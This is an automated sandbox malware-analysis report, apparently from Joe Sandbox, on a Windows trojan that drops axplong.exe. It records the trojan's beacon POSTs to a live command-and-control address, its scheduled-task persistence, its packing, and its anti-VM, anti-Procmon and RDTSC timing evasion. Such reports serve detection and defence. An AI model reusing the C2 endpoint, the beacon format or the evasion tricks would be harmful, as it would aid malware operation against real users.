Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00BEBD60 InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile
Source: unknown HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: axplong.exe, 00000009.00000002.3364157249.000000000122B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php

System Summary

Source: 9ICG2PuZbG.exe Static PE information: section name:
Source: 9ICG2PuZbG.exe Static PE information: section name: .idata
Source: 9ICG2PuZbG.exe Static PE information: section name:
Source: axplong.exe.1.dr Static PE information: section name:
Source: axplong.exe.1.dr Static PE information: section name: .idata
Source: axplong.exe.1.dr Static PE information: section name:
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File created: C:\Windows\Tasks\axplong.job
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe 1DBBF81D6F4B2222B37594E8FF30672BF85FD360F347CBD20B1A5D7B841DD276
Source: 9ICG2PuZbG.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 9ICG2PuZbG.exe Static PE information: Section: ZLIB complexity 0.9967749489100818
Source: 9ICG2PuZbG.exe Static PE information: Section: pcxsfzhs ZLIB complexity 0.9944540457842248
Source: axplong.exe.1.dr Static PE information: Section: ZLIB complexity 0.9967749489100818
Source: axplong.exe.1.dr Static PE information: Section: pcxsfzhs ZLIB complexity 0.9944540457842248
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 9ICG2PuZbG.exe Virustotal: Detection: 52%
Source: 9ICG2PuZbG.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File read: C:\Users\user\Desktop\9ICG2PuZbG.exe
Source: unknown Process created: C:\Users\user\Desktop\9ICG2PuZbG.exe "C:\Users\user\Desktop\9ICG2PuZbG.exe"
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: 9ICG2PuZbG.exe Static file information: File size 1897984 > 1048576
Source: 9ICG2PuZbG.exe Static PE information: Raw size of pcxsfzhs is bigger than: 0x100000 < 0x19da00

Data Obfuscation

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Unpacked PE file: 1.2.9ICG2PuZbG.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 9.2.axplong.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: axplong.exe.1.dr Static PE information: real checksum: 0x1d101c should be: 0x1d2453
Source: 9ICG2PuZbG.exe Static PE information: real checksum: 0x1d101c should be: 0x1d2453
Source: 9ICG2PuZbG.exe Static PE information: section name:
Source: 9ICG2PuZbG.exe Static PE information: section name: .idata
Source: 9ICG2PuZbG.exe Static PE information: section name:
Source: 9ICG2PuZbG.exe Static PE information: section name: pcxsfzhs
Source: 9ICG2PuZbG.exe Static PE information: section name: plzfkdac
Source: 9ICG2PuZbG.exe Static PE information: section name: .taggant
Source: axplong.exe.1.dr Static PE information: section name:
Source: axplong.exe.1.dr Static PE information: section name: .idata
Source: axplong.exe.1.dr Static PE information: section name:
Source: axplong.exe.1.dr Static PE information: section name: pcxsfzhs
Source: axplong.exe.1.dr Static PE information: section name: plzfkdac
Source: axplong.exe.1.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00BFD84C push ecx; ret 9_2_00BFD85F
Source: 9ICG2PuZbG.exe Static PE information: section name: entropy: 7.977259343253602
Source: 9ICG2PuZbG.exe Static PE information: section name: pcxsfzhs entropy: 7.95412617888117
Source: axplong.exe.1.dr Static PE information: section name: entropy: 7.977259343253602
Source: axplong.exe.1.dr Static PE information: section name: pcxsfzhs entropy: 7.95412617888117
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Boot Survival

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 33B3E1 second address: 33B3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3692DA second address: 3692DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3692DE second address: 369301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F3A94CD4084h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 369301 second address: 369322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F3A9502B600h 0x0000000b jmp 00007F3A9502B5F4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36976B second address: 36976F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 369B39 second address: 369B3E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 369B3E second address: 369B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jg 00007F3A94CD4078h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 369B54 second address: 369B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3A9502B5E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 369B5E second address: 369B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 369B62 second address: 369B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36A157 second address: 36A15B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3604AB second address: 3604B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3604B3 second address: 3604B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3604B7 second address: 3604C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3604C0 second address: 3604C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 33EC23 second address: 33EC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3A9502B5E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36A53B second address: 36A547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jne 00007F3A94CD4076h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36AC37 second address: 36AC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36FAC7 second address: 36FAF3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jg 00007F3A94CD4082h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007F3A94CD407Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36FAF3 second address: 36FAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36FAF7 second address: 36FB1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e js 00007F3A94CD407Ch 0x00000014 jg 00007F3A94CD4076h 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36E38C second address: 36E3AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F3A9502B5F6h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3772F8 second address: 377329 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3A94CD4076h 0x00000008 jbe 00007F3A94CD4076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F3A94CD4087h 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F3A94CD4076h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 377329 second address: 37732D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3406C3 second address: 3406CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3406CB second address: 340708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3A9502B5EAh 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3A9502B5EFh 0x00000017 push ebx 0x00000018 jne 00007F3A9502B5E6h 0x0000001e jmp 00007F3A9502B5F4h 0x00000023 pop ebx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376AE0 second address: 376AE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376AE4 second address: 376AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376DF3 second address: 376DFD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A94CD4076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376DFD second address: 376E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376E09 second address: 376E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376E0D second address: 376E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F3A9502B600h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376E3D second address: 376E4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3A94CD407Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376F90 second address: 376F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376F96 second address: 376F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376F9C second address: 376FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A9502B5F8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376FBE second address: 376FD6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F3A94CD407Eh 0x00000010 js 00007F3A94CD4076h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3799A7 second address: 3799AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3799AD second address: 3799B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
